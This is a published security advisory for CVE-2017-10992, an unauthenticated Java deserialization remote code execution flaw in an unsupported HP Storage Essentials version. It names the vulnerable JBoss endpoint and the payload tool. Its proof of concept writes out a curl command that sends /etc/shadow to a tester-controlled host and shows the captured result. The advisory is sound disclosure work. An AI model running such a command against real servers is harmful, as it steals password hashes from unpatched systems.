CVE-2017-10992 - HP Storage Essentials Remote Code Execution via Java deserialization

1. Vulnerability Properties

Title: HP Storage Essentials Remote Code Execution via Java deserialization
CVE ID: CVE-2017-10992
CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vendor: HP (www.hp.com)
Products: HP Storage Essentials 9.5.0.142 (possibly others)
Advisory Release Date: 19 September 2017
Advisory URL: https://labs.integrity.pt/advisories/cve-2017-10992
Credits: Discovery by Filipe Bernardo <fb[at]integrity.pt>

2. Vulnerability Summary

The HP Storage Essentials version 9.5.0.142, is vulnerable to an unauthenticated Remote Code Execution via Java deserialization when a user sends a Java serialized request to the service endpoint at: /invoker/JMXInvokerServlet.

3. Technical Details

The HP Storage Essentials exposes a Java web server at http://[vulnerable_host]/servlet.html, presenting a login form that is used for product administration.

Exploiting the vulnerability

An unauthenticated attacker can send Java serialized payload to the Java server endpoint at http://[vulnerable_host]/invoker/JMXInvokerServlet (which is a JBoss server) and achieve code execution. To achieve remote code execution as a proof of concept, we used the Burp extension “Java SerialKiller” to create a serialized request of the following command:

curl –X post –d @/etc/shadow http://<tester>:8888

The vulnerable server connected to the tester’s machine, which had a netcat session listening on port 8888, and sending the /etc/shadow file as the POST body, confirming the execution of an arbitrary command with root privileges:

connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 33098
post / HTTP/1.1
User-Agent: curl/7.43.0
Accept: /
Content-Length: 971
Content-Type: application/x-www-form-urlencoded

root:[redacted]:17358:0:99999:7:::bin::17110:0:99999:7:::daemon::17110:0:99999:7 […]

4. Vulnerable Versions

  • HP Storage Essentials version 9.5.0.142 (possibly others)

5. Solution

  • HP team answered our mails saying that this version will not get updates so no solution is available. See “6. Workarounds”.

6. Workarounds

  • Ensure all accesses to the management page are controlled by an access list.
  • Contact HP for support.

7. Vulnerability Timeline

  • 18/May/2017 - Vendor contacted, reported vulnerability
  • 23/May/2017 - Vendor answered email, internal ticket PSRT110461
  • 29/May/2017 - Pinged vendor for details; Answered that information was provided to internal product engineering
  • 19/Jun/2017 - Pinged vendor for details; Answered that the product team are still analyzing
  • 07/Jul/2017 - Vendor answered saying that this product is no longer supported, product team will not be remediating this issue
  • 07/Jul/2017 - Mailed Mitre asking for CVE id, Mitre assigned id CVE-2017-10992
  • 19/Sep/2017 - Vulnerability Advisory published

8. References

  • https://softwaresupport.hpe.com/document/-/facetsearch/document/KM01178963